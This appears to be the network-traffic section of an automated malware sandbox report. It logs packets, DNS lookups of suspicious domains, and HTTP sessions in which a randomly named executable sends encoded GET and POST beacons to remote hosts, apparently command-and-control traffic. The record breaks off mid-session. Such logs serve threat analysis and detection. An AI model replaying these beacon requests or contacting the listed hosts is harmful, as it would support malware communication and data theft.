                                                                  Oct 11, 2024 16:47:13.755372047 CEST5001480192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:13.760442019 CEST8050014172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:13.760536909 CEST5001480192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:13.767122030 CEST5001480192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:13.772156000 CEST8050014172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:14.640455961 CEST8050014172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:14.640749931 CEST8050014172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:14.642002106 CEST5001480192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:14.643023014 CEST5001480192.168.2.4172.232.112.221
                                                                  Oct 11, 2024 16:47:14.647922039 CEST8050014172.232.112.221192.168.2.4
                                                                  Oct 11, 2024 16:47:21.047708988 CEST5001580192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:21.053093910 CEST8050015154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:21.053240061 CEST5001580192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:21.063700914 CEST5001580192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:21.069173098 CEST8050015154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:22.567893028 CEST5001580192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:22.614417076 CEST8050015154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:23.584547043 CEST5001680192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:23.590001106 CEST8050016154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:23.590075016 CEST5001680192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:23.608690977 CEST5001680192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:23.613746881 CEST8050016154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:25.112082958 CEST5001680192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:25.158164024 CEST8050016154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.130319118 CEST5001780192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:26.136437893 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.138437986 CEST5001780192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:26.150166988 CEST5001780192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:26.155287981 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.155343056 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.155370951 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.155514956 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.155543089 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.155570030 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.155596972 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.155692101 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:26.155858040 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:27.659029961 CEST5001780192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:27.706206083 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:28.677932024 CEST5001880192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:28.683559895 CEST8050018154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:28.686499119 CEST5001880192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:28.693123102 CEST5001880192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:28.698065042 CEST8050018154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:42.452775002 CEST8050015154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:42.454813004 CEST5001580192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:44.964689016 CEST8050016154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:44.967415094 CEST5001680192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:47.496560097 CEST8050017154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:47.496623039 CEST5001780192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:50.044778109 CEST8050018154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:50.044926882 CEST5001880192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:50.045964003 CEST5001880192.168.2.4154.82.70.195
                                                                  Oct 11, 2024 16:47:50.051780939 CEST8050018154.82.70.195192.168.2.4
                                                                  Oct 11, 2024 16:47:55.088648081 CEST5001980192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:55.093941927 CEST80500193.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:47:55.098190069 CEST5001980192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:55.109816074 CEST5001980192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:55.114933014 CEST80500193.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:47:55.563714981 CEST80500193.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:47:55.563772917 CEST5001980192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:56.614108086 CEST5001980192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:56.619362116 CEST80500193.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:47:57.631424904 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:57.636521101 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:47:57.636610985 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:57.648400068 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:57.653542995 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:47:58.112895966 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:47:58.112996101 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:59.159761906 CEST5002080192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:47:59.165317059 CEST80500203.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.179764032 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:00.184875965 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.190387964 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:00.199784994 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:00.204847097 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.204876900 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.204905987 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.204932928 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.204987049 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.205013990 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.205066919 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.205092907 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.205120087 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.795563936 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:00.795767069 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:01.705903053 CEST5002180192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:01.711116076 CEST80500213.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:02.776514053 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:02.782488108 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:02.784434080 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:02.793768883 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:02.798746109 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:03.253010035 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:03.253181934 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:03.253231049 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:03.256416082 CEST5002280192.168.2.43.33.130.190
                                                                  Oct 11, 2024 16:48:03.261394024 CEST80500223.33.130.190192.168.2.4
                                                                  Oct 11, 2024 16:48:08.310374975 CEST5002380192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:08.315630913 CEST8050023207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:08.319778919 CEST5002380192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:08.327770948 CEST5002380192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:08.333115101 CEST8050023207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:08.964145899 CEST8050023207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:08.964306116 CEST8050023207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:08.964628935 CEST8050023207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:08.964641094 CEST5002380192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:08.967540026 CEST5002380192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:09.830881119 CEST5002380192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:10.851775885 CEST5002480192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:10.859596014 CEST8050024207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:10.863955021 CEST5002480192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:10.873336077 CEST5002480192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:10.883124113 CEST8050024207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:11.557765007 CEST8050024207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:11.557816982 CEST8050024207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:11.557868958 CEST5002480192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:11.557941914 CEST8050024207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:11.557991982 CEST5002480192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:12.377863884 CEST5002480192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:13.397917986 CEST5002580192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:13.403225899 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:13.403305054 CEST5002580192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:13.425134897 CEST5002580192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:13.430238962 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:13.430270910 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:13.430299997 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:13.430347919 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:13.430376053 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:13.430402994 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:13.430429935 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:13.430461884 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:13.430557013 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:14.037837029 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:14.038260937 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:14.038275957 CEST8050025207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:14.038340092 CEST5002580192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:14.038340092 CEST5002580192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:14.940282106 CEST5002580192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:15.958879948 CEST5002680192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:15.964075089 CEST8050026207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:15.964154959 CEST5002680192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:15.970957994 CEST5002680192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:15.976712942 CEST8050026207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:16.620878935 CEST8050026207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:16.621902943 CEST8050026207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:16.621917963 CEST8050026207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:16.622040033 CEST5002680192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:16.622040033 CEST5002680192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:16.624449968 CEST5002680192.168.2.4207.154.246.21
                                                                  Oct 11, 2024 16:48:16.632841110 CEST8050026207.154.246.21192.168.2.4
                                                                  Oct 11, 2024 16:48:21.717958927 CEST5002780192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:21.723767996 CEST805002765.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:21.723839045 CEST5002780192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:21.734302044 CEST5002780192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:21.740325928 CEST805002765.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:22.409790993 CEST805002765.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:22.410037041 CEST805002765.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:22.411844969 CEST5002780192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:23.241545916 CEST5002780192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:24.259941101 CEST5002880192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:24.265160084 CEST805002865.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:24.266041040 CEST5002880192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:24.274715900 CEST5002880192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:24.279961109 CEST805002865.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:24.942148924 CEST805002865.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:24.942243099 CEST805002865.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:24.942363977 CEST5002880192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:25.784226894 CEST5002880192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:26.803786039 CEST5002980192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:26.808641911 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:26.811902046 CEST5002980192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:26.823822975 CEST5002980192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:26.828774929 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:26.828794003 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:26.828809023 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:26.828820944 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:26.828886986 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:26.828898907 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:26.828921080 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:26.829087019 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:26.829129934 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:27.482517958 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:27.482842922 CEST805002965.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:27.482920885 CEST5002980192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:28.330943108 CEST5002980192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:29.349693060 CEST5003080192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:29.354866028 CEST805003065.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:29.354949951 CEST5003080192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:29.361876965 CEST5003080192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:29.366889954 CEST805003065.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:30.033767939 CEST805003065.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:30.033811092 CEST805003065.21.196.90192.168.2.4
                                                                  Oct 11, 2024 16:48:30.033947945 CEST5003080192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:30.036766052 CEST5003080192.168.2.465.21.196.90
                                                                  Oct 11, 2024 16:48:30.042108059 CEST805003065.21.196.90192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 11, 2024 16:46:18.032829046 CEST5839353192.168.2.41.1.1.1
                                                                  Oct 11, 2024 16:46:18.045743942 CEST53583931.1.1.1192.168.2.4
                                                                  Oct 11, 2024 16:46:38.615010023 CEST6120253192.168.2.41.1.1.1
                                                                  Oct 11, 2024 16:46:38.789076090 CEST53612021.1.1.1192.168.2.4
                                                                  Oct 11, 2024 16:46:51.913425922 CEST5827753192.168.2.41.1.1.1
                                                                  Oct 11, 2024 16:46:51.988400936 CEST53582771.1.1.1192.168.2.4
                                                                  Oct 11, 2024 16:47:05.115464926 CEST5284453192.168.2.41.1.1.1
                                                                  Oct 11, 2024 16:47:06.115894079 CEST53528441.1.1.1192.168.2.4
                                                                  Oct 11, 2024 16:47:19.647006035 CEST6144953192.168.2.41.1.1.1
                                                                  Oct 11, 2024 16:47:20.643723965 CEST6144953192.168.2.41.1.1.1
                                                                  Oct 11, 2024 16:47:21.039760113 CEST53614491.1.1.1192.168.2.4
                                                                  Oct 11, 2024 16:47:21.039977074 CEST53614491.1.1.1192.168.2.4
                                                                  Oct 11, 2024 16:47:55.058331966 CEST5292953192.168.2.41.1.1.1
                                                                  Oct 11, 2024 16:47:55.085275888 CEST53529291.1.1.1192.168.2.4
                                                                  Oct 11, 2024 16:48:08.271644115 CEST5142653192.168.2.41.1.1.1
                                                                  Oct 11, 2024 16:48:08.305282116 CEST53514261.1.1.1192.168.2.4
                                                                  Oct 11, 2024 16:48:21.632040977 CEST5801353192.168.2.41.1.1.1
                                                                  Oct 11, 2024 16:48:21.709378958 CEST53580131.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Oct 11, 2024 16:46:18.032829046 CEST192.168.2.41.1.1.10x48c5Standard query (0)www.wishlists.funA (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:46:38.615010023 CEST192.168.2.41.1.1.10xa755Standard query (0)www.webeuz.buzzA (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:46:51.913425922 CEST192.168.2.41.1.1.10xe6e7Standard query (0)www.b-ambu.comA (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:05.115464926 CEST192.168.2.41.1.1.10xb1f5Standard query (0)www.weeksee.netA (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:19.647006035 CEST192.168.2.41.1.1.10x5784Standard query (0)www.ddzc.storeA (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:20.643723965 CEST192.168.2.41.1.1.10x5784Standard query (0)www.ddzc.storeA (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:55.058331966 CEST192.168.2.41.1.1.10xc905Standard query (0)www.trencheslondon.storeA (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:48:08.271644115 CEST192.168.2.41.1.1.10x7093Standard query (0)www.i8ty.xyzA (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:48:21.632040977 CEST192.168.2.41.1.1.10xe11cStandard query (0)www.030002832.xyzA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 11, 2024 16:46:18.045743942 CEST1.1.1.1192.168.2.40x48c5No error (0)www.wishlists.funwishlists.funCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 11, 2024 16:46:18.045743942 CEST1.1.1.1192.168.2.40x48c5No error (0)wishlists.fun3.33.130.190A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:46:18.045743942 CEST1.1.1.1192.168.2.40x48c5No error (0)wishlists.fun15.197.148.33A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:46:38.789076090 CEST1.1.1.1192.168.2.40xa755No error (0)www.webeuz.buzz75.2.103.23A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:46:51.988400936 CEST1.1.1.1192.168.2.40xe6e7No error (0)www.b-ambu.comb-ambu.comCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 11, 2024 16:46:51.988400936 CEST1.1.1.1192.168.2.40xe6e7No error (0)b-ambu.com84.32.84.32A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:06.115894079 CEST1.1.1.1192.168.2.40xb1f5No error (0)www.weeksee.net172.232.112.221A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:21.039760113 CEST1.1.1.1192.168.2.40x5784No error (0)www.ddzc.store154.82.70.195A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:21.039760113 CEST1.1.1.1192.168.2.40x5784No error (0)www.ddzc.store206.238.106.156A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:21.039977074 CEST1.1.1.1192.168.2.40x5784No error (0)www.ddzc.store154.82.70.195A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:21.039977074 CEST1.1.1.1192.168.2.40x5784No error (0)www.ddzc.store206.238.106.156A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:55.085275888 CEST1.1.1.1192.168.2.40xc905No error (0)www.trencheslondon.storetrencheslondon.storeCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:55.085275888 CEST1.1.1.1192.168.2.40xc905No error (0)trencheslondon.store3.33.130.190A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:47:55.085275888 CEST1.1.1.1192.168.2.40xc905No error (0)trencheslondon.store15.197.148.33A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:48:08.305282116 CEST1.1.1.1192.168.2.40x7093No error (0)www.i8ty.xyz207.154.246.21A (IP address)IN (0x0001)false
                                                                  Oct 11, 2024 16:48:21.709378958 CEST1.1.1.1192.168.2.40xe11cNo error (0)www.030002832.xyz030002832.xyzCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 11, 2024 16:48:21.709378958 CEST1.1.1.1192.168.2.40xe11cNo error (0)030002832.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                                  • www.wishlists.fun
                                                                  • www.webeuz.buzz
                                                                  • www.b-ambu.com
                                                                  • www.weeksee.net
                                                                  • www.ddzc.store
                                                                  • www.trencheslondon.store
                                                                  • www.i8ty.xyz
                                                                  • www.030002832.xyz
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.4497373.33.130.190803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:46:18.068767071 CEST464OUTGET /j5xl/?Vt8pNT=UbSkj6Vbkzt4xk/BQnnYbYTXmRPkUKt1YkqUNfRg8HqP8fdFaUbTKuozRqV2B7LpcmAJePLPvqhI8UaQpGGHaeFBe2TuO5Ibc+NjtYApVRqMFDlNrBJ0s0I=&e4x=ktCxONu0 HTTP/1.1
                                                                  Host: www.wishlists.fun
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Oct 11, 2024 16:46:18.518805027 CEST395INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Fri, 11 Oct 2024 14:46:18 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 255
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 74 38 70 4e 54 3d 55 62 53 6b 6a 36 56 62 6b 7a 74 34 78 6b 2f 42 51 6e 6e 59 62 59 54 58 6d 52 50 6b 55 4b 74 31 59 6b 71 55 4e 66 52 67 38 48 71 50 38 66 64 46 61 55 62 54 4b 75 6f 7a 52 71 56 32 42 37 4c 70 63 6d 41 4a 65 50 4c 50 76 71 68 49 38 55 61 51 70 47 47 48 61 65 46 42 65 32 54 75 4f 35 49 62 63 2b 4e 6a 74 59 41 70 56 52 71 4d 46 44 6c 4e 72 42 4a 30 73 30 49 3d 26 65 34 78 3d 6b 74 43 78 4f 4e 75 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vt8pNT=UbSkj6Vbkzt4xk/BQnnYbYTXmRPkUKt1YkqUNfRg8HqP8fdFaUbTKuozRqV2B7LpcmAJePLPvqhI8UaQpGGHaeFBe2TuO5Ibc+NjtYApVRqMFDlNrBJ0s0I=&e4x=ktCxONu0"}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.44986275.2.103.23803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:46:38.808094978 CEST728OUTPOST /pw0n/ HTTP/1.1
                                                                  Host: www.webeuz.buzz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.webeuz.buzz
                                                                  Referer: http://www.webeuz.buzz/pw0n/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 75 49 2b 41 61 70 43 43 35 32 6a 36 71 65 50 45 64 72 31 68 38 6c 38 56 72 42 75 71 36 48 79 6a 2f 57 64 32 30 64 51 73 63 69 6f 7a 46 58 66 42 59 4b 43 41 30 39 49 2b 49 58 33 54 59 75 44 54 6d 74 6a 54 57 4a 59 48 32 62 2f 32 4e 6c 4e 4f 6b 79 6b 41 33 2f 33 72 73 30 69 49 61 53 38 49 4a 41 49 67 35 43 4e 6a 79 32 68 6a 7a 4c 4a 6c 45 63 6c 44 42 49 50 53 58 50 32 73 67 6a 49 70 75 49 6a 55 43 6c 47 4d 6a 57 33 39 31 4e 7a 53 6a 45 46 46 36 6c 78 53 45 39 6b 36 63 32 64 34 76 62 37 4e 4e 47 72 70 48 45 2b 42 2b 68 67 73 66 53 5a 44 41 71 53 4b 6a 58 46 34 71 43 74 42 53 51 3d 3d
                                                                  Data Ascii: Vt8pNT=uI+AapCC52j6qePEdr1h8l8VrBuq6Hyj/Wd20dQsciozFXfBYKCA09I+IX3TYuDTmtjTWJYH2b/2NlNOkykA3/3rs0iIaS8IJAIg5CNjy2hjzLJlEclDBIPSXP2sgjIpuIjUClGMjW391NzSjEFF6lxSE9k6c2d4vb7NNGrpHE+B+hgsfSZDAqSKjXF4qCtBSQ==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.44987875.2.103.23803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:46:41.351358891 CEST748OUTPOST /pw0n/ HTTP/1.1
